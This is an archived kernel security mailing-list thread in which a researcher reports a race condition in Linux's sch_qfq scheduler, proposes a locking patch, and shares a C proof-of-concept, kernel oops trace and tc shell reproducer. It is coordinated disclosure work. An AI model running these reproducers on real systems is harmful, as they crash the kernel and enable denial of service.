lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <CAM0EoM=vtAhdDp4CrHN9PGKrAXUBYiD-o3L6gT0=5U_eK0qf_w@mail.gmail.com>
Date: Tue, 1 Jul 2025 10:02:23 -0400
From: Jamal Hadi Salim <jhs@...atatu.com>
To: Xiang Mei <xmei5@....edu>
Cc: security@...nel.org, 
	Linux Kernel Network Developers <netdev@...r.kernel.org>, Cong Wang <xiyou.wangcong@...il.com>
Subject: Re: sch_qfq: race conditon on qfq_aggregate (net/sched/sch_qfq.c)

On Mon, Jun 30, 2025 at 2:49 PM Xiang Mei <xmei5@....edu> wrote:
>
> Thank you very much for your time. We've re-tested the PoC and
> confirmed it works on the latest kernels (6.12.35, 6.6.95, and
> 6.16-rc4).
>
> To help with reproduction, here are a few notes that might be useful:
> 1. The QFQ scheduler needs to be compiled into the kernel:
>     $ scripts/config --enable CONFIG_NET_SCHED
>     $ scripts/config --enable CONFIG_NET_SCH_QFQ
> 2. Since this is a race condition, the test environment should have at
> least two cores (e.g., -smp cores=2 for QEMU).
> 3. The PoC was compiled using: `gcc ./poc.c -o ./poc  -w --static`
> 4. Before running the PoC, please check that the network interface
> "lo" is in the "up" state.
>

Yes, for this POC i can confirm activates the issue.

Sorry, I actually meant your other/different patch/issue earlier which
has the following reproducer:
tc qdisc del dev lo root 2>/dev/null
tc qdisc add dev lo root handle 1: qfq
tc class add dev lo parent 1: classid 1:1 qfq weight 1 maxpkt 1024
tc qdisc add dev lo parent 1:1 handle 10: fq maxrate 1
tc filter add dev lo protocol all parent 1: prio 1 basic \
  match "meta(priority eq 0x20001)" \
  flowid 1:1
while true; do ping -c 1 127.0.0.1 > /dev/null; done

Does this reproducer work for you for that example?

cheers,
jamal



> Appreciate your feedback and patience.
>
> Best regards,
> Xiang Mei
>
>
> On Mon, Jun 30, 2025 at 4:36 AM Jamal Hadi Salim <jhs@...atatu.com> wrote:
> >
> > On Sun, Jun 29, 2025 at 11:11 PM Xiang Mei <xmei5@....edu> wrote:
> > >
> > > On Sun, Jun 29, 2025 at 10:28:12AM -0400, Jamal Hadi Salim wrote:
> > > > On Sun, Jun 29, 2025 at 3:13 AM Xiang Mei <xmei5@....edu> wrote:
> > > > >
> > > > > Linux Kernel Security Team,
> > > > >
> > > > > We are writing to bring to your attention a race condition vulnerability in net/sched/sch_qfq.c.
> > > > >
> > > > > In function qfq_delete_class, the line `qfq_destroy_class(sch, cl);` is outside the protection of ` sch_tree_lock`, so any operation on agg could lead to a race condition vulnerability. For example, we can get a UAF by racing it with qfq_change_agg in qfq_enqueue.
> > > > >
> > > > > We verified it on v6.6.94 and exploited it in kernelCTF cos-109-17800.519.32.
> > > > > A temporal fix could be
> > > > > ```c
> > > > > @@ -558,10 +562,9 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
> > > > >
> > > > >  qdisc_purge_queue(cl->qdisc);
> > > > >  qdisc_class_hash_remove(&q->clhash, &cl->common);
> > > > > -
> > > > > +        qfq_destroy_class(sch, cl);
> > > > >  sch_tree_unlock(sch);
> > > > >
> > > > > -       qfq_destroy_class(sch, cl);
> > > > >  return 0;
> > > > >  }
> > > > > ```
> > > > >
> > > > > But this only avoids the exploitation. There are other places to exploit the vulnerability with a General Protection (usually null-deref). We found two places that can crash the kernel:
> > > > >
> > > > > 1. When modifying an existing class in  qfq_change_class, the reads of cl->agg->weight or cl->agg->lmax could lead to GPs.
> > > > > 2. Reads of agg content in qfq_dump_class could lead to GPs.
> > > > >
> > > > > These reads of the agg structure may require `RCU` or `lock` to protect.
> > > > >
> > > > > Looking forward to hearing from you and discussing the patching.
> > > > >
> > > >
> > > >
> > > > Please partake in the discussion to fix this, your other issue and
> > > > others on the netdev list, start with this thread:
> > > > https://lore.kernel.org/netdev/aF847kk6H+kr5kIV@pop-os.localdomain/
> > >
> > > Thanks so much for your time and the helpful information.
> > >
> > > Here is a potential patch to this vulnerability:
> > >
> > > sch_lock was used to protect the read/write options of aggs. The
> > > lock may influence the performance of the scheduler, and RCU could also
> > > be a patch option.
> > >
> >
> >
> > I did test your earlier repro and could not create the issue. I dont
> > have time right now, but are you sure this new repro can create the
> > issue?
> >
> > cheers,
> > jamal
> >
> > > ```
> > > From e64c4f5d662dc3f3c5dedf4b755a151d826d7f70 Mon Sep 17 00:00:00 2001
> > > From: n132 <xmei5@....edu>
> > > Date: Sun, 29 Jun 2025 16:26:43 -0700
> > > Subject: [PATCH] net/sched: sch_qfq: Fix qfq_aggregate race condition
> > >
> > > Apply sch_lock when reading or modifying agg data to prevent race conditions between class options and enqueue.
> > > ---
> > >  net/sched/sch_qfq.c | 30 +++++++++++++++++++++---------
> > >  1 file changed, 21 insertions(+), 9 deletions(-)
> > >
> > > diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
> > > index bf1282cb22eb..dc77ffc01bb3 100644
> > > --- a/net/sched/sch_qfq.c
> > > +++ b/net/sched/sch_qfq.c
> > > @@ -412,7 +412,7 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
> > >         bool existing = false;
> > >         struct nlattr *tb[TCA_QFQ_MAX + 1];
> > >         struct qfq_aggregate *new_agg = NULL;
> > > -       u32 weight, lmax, inv_w;
> > > +       u32 weight, lmax, inv_w, old_weight, old_lmax;
> > >         int err;
> > >         int delta_w;
> > >
> > > @@ -443,12 +443,16 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
> > >         inv_w = ONE_FP / weight;
> > >         weight = ONE_FP / inv_w;
> > >
> > > -       if (cl != NULL &&
> > > -          lmax == cl->agg->lmax &&
> > > -          weight == cl->agg->class_weight)
> > > -               return 0; /* nothing to change */
> > > +       if(cl != NULL){
> > > +               sch_tree_lock(sch);
> > > +               old_weight = cl->agg->class_weight;
> > > +               old_lmax   = cl->agg->lmax;
> > > +               sch_tree_unlock(sch);
> > > +               if (lmax == old_lmax && weight == old_weight)
> > > +                       return 0; /* nothing to change */
> > > +       }
> > >
> > > -       delta_w = weight - (cl ? cl->agg->class_weight : 0);
> > > +       delta_w = weight - (cl ? old_weight : 0);
> > >
> > >         if (q->wsum + delta_w > QFQ_MAX_WSUM) {
> > >                 NL_SET_ERR_MSG_FMT_MOD(extack,
> > > @@ -555,10 +559,10 @@ static int qfq_delete_class(struct Qdisc *sch, unsigned long arg,
> > >
> > >         qdisc_purge_queue(cl->qdisc);
> > >         qdisc_class_hash_remove(&q->clhash, &cl->common);
> > > +       qfq_destroy_class(sch, cl);
> > >
> > >         sch_tree_unlock(sch);
> > >
> > > -       qfq_destroy_class(sch, cl);
> > >         return 0;
> > >  }
> > >
> > > @@ -625,6 +629,8 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
> > >  {
> > >         struct qfq_class *cl = (struct qfq_class *)arg;
> > >         struct nlattr *nest;
> > > +       u32 class_weight;
> > > +       u32 lmax;
> > >
> > >         tcm->tcm_parent = TC_H_ROOT;
> > >         tcm->tcm_handle = cl->common.classid;
> > > @@ -633,8 +639,12 @@ static int qfq_dump_class(struct Qdisc *sch, unsigned long arg,
> > >         nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
> > >         if (nest == NULL)
> > >                 goto nla_put_failure;
> > > -       if (nla_put_u32(skb, TCA_QFQ_WEIGHT, cl->agg->class_weight) ||
> > > -          nla_put_u32(skb, TCA_QFQ_LMAX, cl->agg->lmax))
> > > +       sch_tree_lock(sch);
> > > +       class_weight = cl->agg->class_weight;
> > > +       lmax         = cl->agg->lmax;
> > > +       sch_tree_unlock(sch);
> > > +       if (nla_put_u32(skb, TCA_QFQ_WEIGHT, class_weight) ||
> > > +          nla_put_u32(skb, TCA_QFQ_LMAX, lmax))
> > >                 goto nla_put_failure;
> > >         return nla_nest_end(skb, nest);
> > >
> > > @@ -651,8 +661,10 @@ static int qfq_dump_class_stats(struct Qdisc *sch, unsigned long arg,
> > >
> > >         memset(&xstats, 0, sizeof(xstats));
> > >
> > > +       sch_tree_lock(sch);
> > >         xstats.weight = cl->agg->class_weight;
> > >         xstats.lmax = cl->agg->lmax;
> > > +       sch_tree_unlock(sch);
> > >
> > >         if (gnet_stats_copy_basic(d, NULL, &cl->bstats, true) < 0 ||
> > >            gnet_stats_copy_rate_est(d, &cl->rate_est) < 0 ||
> > > --
> > > 2.43.0
> > > ```
> > >
> > > Here is the PoC triggering the race condition for your reference:
> > >
> > > ```c
> > > #include <stdio.h>
> > > #include <sys/socket.h>
> > > #include <linux/rtnetlink.h>
> > > #include <linux/pkt_sched.h>
> > > #include <linux/if_arp.h>
> > > struct tf_msg {
> > >     struct nlmsghdr nlh;
> > >     struct tcmsg tcm;
> > > #define TC_DATA_LEN 0x200
> > >     char attrbuf[TC_DATA_LEN];
> > > };
> > > struct if_msg {
> > >     struct nlmsghdr nlh;
> > >     struct ifinfomsg ifi;
> > > };
> > > typedef unsigned int u32;
> > > int nl, inet_sock_fd;
> > > char *  msgQdiscCreate;
> > > char *  tclass_0x20001_create;
> > > char *  tclass_0x20002_create;
> > > char *  tclass_0x20001_reset;
> > >
> > > unsigned short add_rtattr (unsigned long rta_addr, unsigned short type, unsigned short len, char *data) {
> > >     struct rtattr *rta = (struct rtattr *)rta_addr;
> > >     rta->rta_type = type;
> > >     rta->rta_len = RTA_LENGTH(len);
> > >     memcpy(RTA_DATA(rta), data, len);
> > >     return rta->rta_len;
> > > }
> > > int initNL(){
> > >     struct if_msg if_up_msg = {
> > >         {
> > >             .nlmsg_len = 32,
> > >             .nlmsg_type = RTM_NEWLINK,
> > >             .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK,
> > >         },
> > >         {
> > >             .ifi_family = AF_UNSPEC,
> > >             .ifi_type = ARPHRD_NETROM,
> > >             .ifi_index = 1,
> > >             .ifi_flags = IFF_UP,
> > >             .ifi_change = 1,
> > >         },
> > >     };
> > >     int nl_sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
> > >     if_up_msg.ifi.ifi_index = if_nametoindex("lo");
> > >     NLMsgSend(nl_sock_fd, (struct tf_msg *)(&if_up_msg));
> > >     return nl_sock_fd;
> > > }
> > > void NLMsgSend (int sock, struct tf_msg *m) {
> > >     struct {
> > >         struct nlmsghdr nh;
> > >         struct nlmsgerr ne;
> > >     } ack;
> > >     write(sock, m, m->nlh.nlmsg_len);
> > >     read(sock , &ack, sizeof(ack));
> > > }
> > > /* Prepared Values*/
> > > void init_loopbacksend (u32 prio) {
> > >     struct sockaddr iaddr = { AF_INET };
> > >     inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0);
> > >     int res = setsockopt(inet_sock_fd, SOL_SOCKET, SO_PRIORITY, &prio, sizeof(prio));
> > >     connect(inet_sock_fd, &iaddr, sizeof(iaddr));
> > > }
> > >
> > > /* Trafic control for netlink */
> > > void init_tf_msg (struct tf_msg *m) {
> > >     m->nlh.nlmsg_len    = NLMSG_LENGTH(sizeof(m->tcm));
> > >     m->nlh.nlmsg_type   = 0;    // Default Value
> > >     m->nlh.nlmsg_flags  = NLM_F_REQUEST | NLM_F_ACK;
> > >     m->nlh.nlmsg_seq    = 0;    // Default Value
> > >     m->nlh.nlmsg_pid    = 0;    // Default Value
> > >
> > >     // tcmsg
> > >     m->tcm.tcm_family   = PF_UNSPEC;
> > >     m->tcm.tcm_ifindex  = if_nametoindex("lo");
> > >     m->tcm.tcm_handle   = 0;    // Default Value
> > >     m->tcm.tcm_parent   = -1;   // Default Value for no parent
> > >     m->tcm.tcm_info     = 0;    // Default Value
> > > }
> > >
> > > struct tf_msg * classGet(u32 classid){
> > >     struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
> > >     init_tf_msg(m);
> > >     m->nlh.nlmsg_type        = RTM_GETTCLASS;
> > >     m->tcm.tcm_handle        = classid;
> > >     return m;
> > > }
> > > struct tf_msg * qfqQdiscAdd(u32 handle, u32 parent) {
> > >     struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
> > >     init_tf_msg(m);
> > >     m->nlh.nlmsg_type    = RTM_NEWQDISC;
> > >     m->nlh.nlmsg_flags   |= NLM_F_CREATE;
> > >     m->tcm.tcm_handle    = handle;
> > >     m->tcm.tcm_parent    = parent;
> > >     m->nlh.nlmsg_len     += NLMSG_ALIGN(add_rtattr((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq"));
> > >     return m;
> > > }
> > > struct tf_msg * qfqClassAdd(int type, u32 classid,u32 val){
> > >     struct tf_msg *m = calloc(1,sizeof(struct tf_msg));
> > >     init_tf_msg(m);
> > >     m->nlh.nlmsg_type       = RTM_NEWTCLASS;
> > >     m->tcm.tcm_parent       = 0;
> > >     m->tcm.tcm_handle       = classid;
> > >     m->nlh.nlmsg_flags      |= NLM_F_CREATE;
> > >     m->nlh.nlmsg_len        += NLMSG_ALIGN(add_rtattr((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq"));
> > >
> > >     struct rtattr *opts     = (struct rtattr *)((size_t)m + NLMSG_ALIGN(m->nlh.nlmsg_len));
> > >     opts->rta_type          = TCA_OPTIONS;
> > >     opts->rta_len           = RTA_LENGTH(0);
> > >
> > >     if(type == TCA_QFQ_LMAX)
> > >         opts->rta_len += RTA_ALIGN(add_rtattr((size_t)opts + opts->rta_len, TCA_QFQ_LMAX, sizeof(val), (char *)&val));
> > >     else if(type == TCA_QFQ_WEIGHT)
> > >         opts->rta_len += RTA_ALIGN(add_rtattr((size_t)opts + opts->rta_len, TCA_QFQ_WEIGHT, sizeof(val), (char *)&val));
> > >     m->nlh.nlmsg_len += NLMSG_ALIGN(opts->rta_len);
> > >     return m;
> > > }
> > > void initContext(){
> > >     msgQdiscCreate =        qfqQdiscAdd(0x20000,-1);
> > >     tclass_0x20001_reset  = tclass_0x20001_create = qfqClassAdd(TCA_QFQ_LMAX,0x20001,0x200);
> > >     tclass_0x20002_create = qfqClassAdd(TCA_QFQ_LMAX,0x20002,0x400);
> > > }
> > > int main(){
> > >     initContext();
> > >     nl = initNL();
> > >     NLMsgSend(nl,msgQdiscCreate);
> > >     NLMsgSend(nl,tclass_0x20001_create);
> > >     NLMsgSend(nl,tclass_0x20002_create);
> > >     init_loopbacksend(0x20001);
> > >     if(fork()){
> > >         while(1){
> > >             write(inet_sock_fd, "", 0x400-42); // upgrade
> > >             NLMsgSend(nl,tclass_0x20001_reset);
> > >         }
> > >     }else{
> > >         char * pay = classGet(0x20001);
> > >         while(1)
> > >             NLMsgSend(nl,pay);
> > >     }
> > > }
> > >
> > > /*
> > > [    1.078863] BUG: kernel NULL pointer dereference, address: 0000000000000028
> > > [    1.079284] #PF: supervisor read access in kernel mode
> > > [    1.079580] #PF: error_code(0x0000) - not-present page
> > > [    1.079882] PGD 101e10067 P4D 101e10067 PUD 101e11067 PMD 0
> > > [    1.080211] Oops: 0000 [#1] PREEMPT SMP NOPTI
> > > [    1.080466] CPU: 1 PID: 117 Comm: exploit Not tainted 6.6.94 #1
> > > [    1.080873] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
> > > [    1.081426] RIP: 0010:qfq_dump_class+0x7f/0x120
> > > [    1.081700] Code: 2b 95 ff 85 c0 0f 88 a3 00 00 00 4d 85 e4 0f 84 9a 00 00 00 48 8b 45 68 48 8d 4c 24 04 ba 04 00 00 00 48 89 df be 01 00 00 00 <8b> 40 28 89 44 24 04 e8 c5 2b 95 ff 85 c0 75 5b 48 8b 45 68 48 8d
> > > [    1.082747] RSP: 0018:ffffc900004975b0 EFLAGS: 00010282
> > > [    1.083050] RAX: 0000000000000000 RBX: ffff8881013e7100 RCX: ffffc900004975b4
> > > [    1.083447] RDX: 0000000000000004 RSI: 0000000000000001 RDI: ffff8881013e7100
> > > [    1.083846] RBP: ffff888100b90380 R08: 0000000000000014 R09: ffff88810177e030
> > > [    1.084238] R10: 00000000000381a0 R11: ffff888101fd8000 R12: ffff88810177e02c
> > > [    1.084645] R13: ffff88810177e000 R14: ffffffff82d662a0 R15: ffff888101fd8000
> > > [    1.085072] FS:  00000000198fe3c0(0000) GS:ffff88811c500000(0000) knlGS:0000000000000000
> > > [    1.085557] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > > [    1.085888] CR2: 0000000000000028 CR3: 000000010168e000 CR4: 0000000000750ee0
> > > [    1.086329] PKRU: 55555554
> > > [    1.086491] Call Trace:
> > > [    1.086645]  <TASK>
> > > [    1.086777]  tc_fill_tclass+0x145/0x240
> > > [    1.087008]  tclass_notify.constprop.0+0x6a/0xd0
> > > [    1.087275]  tc_ctl_tclass+0x3bc/0x5a0
> > > [    1.087496]  rtnetlink_rcv_msg+0x14e/0x3d0
> > > [    1.087734]  ? kmem_cache_alloc_node+0x4b/0x520
> > > [    1.088011]  ? __pfx_rtnetlink_rcv_msg+0x10/0x10
> > > [    1.088281]  netlink_rcv_skb+0x57/0x100
> > > [    1.088506]  netlink_unicast+0x247/0x390
> > > [    1.088733]  netlink_sendmsg+0x250/0x4d0
> > > [    1.088964]  sock_write_iter+0x199/0x1a0
> > > [    1.089192]  vfs_write+0x393/0x440
> > > [    1.089396]  ksys_write+0xb7/0xf0
> > > [    1.089591]  do_syscall_64+0x5e/0x90
> > > [    1.089801]  ? do_syscall_64+0x6a/0x90
> > > [    1.090022]  ? netlink_rcv_skb+0x84/0x100
> > > [    1.090254]  ? kmem_cache_free+0x1e/0x360
> > > [    1.090484]  ? kmem_cache_free+0x1e/0x360
> > > [    1.090713]  ? netlink_unicast+0x252/0x390
> > > [    1.090953]  ? netlink_sendmsg+0x25d/0x4d0
> > > [    1.091189]  ? sock_write_iter+0x199/0x1a0
> > > [    1.091425]  ? vfs_write+0x393/0x440
> > > [    1.091633]  ? exit_to_user_mode_prepare+0x1a/0x150
> > > [    1.091915]  ? syscall_exit_to_user_mode+0x27/0x40
> > > [    1.092190]  ? do_syscall_64+0x6a/0x90
> > > [    1.092407]  ? exit_to_user_mode_prepare+0x1a/0x150
> > > [    1.092686]  ? syscall_exit_to_user_mode+0x27/0x40
> > > [    1.092962]  ? do_syscall_64+0x6a/0x90
> > > [    1.093180]  ? do_syscall_64+0x6a/0x90
> > > [    1.093397]  ? clear_bhb_loop+0x60/0xb0
> > > [    1.093620]  ? clear_bhb_loop+0x60/0xb0
> > > [    1.093842]  ? clear_bhb_loop+0x60/0xb0
> > > [    1.094066]  ? clear_bhb_loop+0x60/0xb0
> > > [    1.094287]  ? clear_bhb_loop+0x60/0xb0
> > > [    1.094508]  entry_SYSCALL_64_after_hwframe+0x78/0xe2
> > > */
> > > ```
> > >
> > > >
> > > > cheers,
> > > > jamal
> > > >
> > > >
> > > > > Thanks,
> > > > > Xiang Mei

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ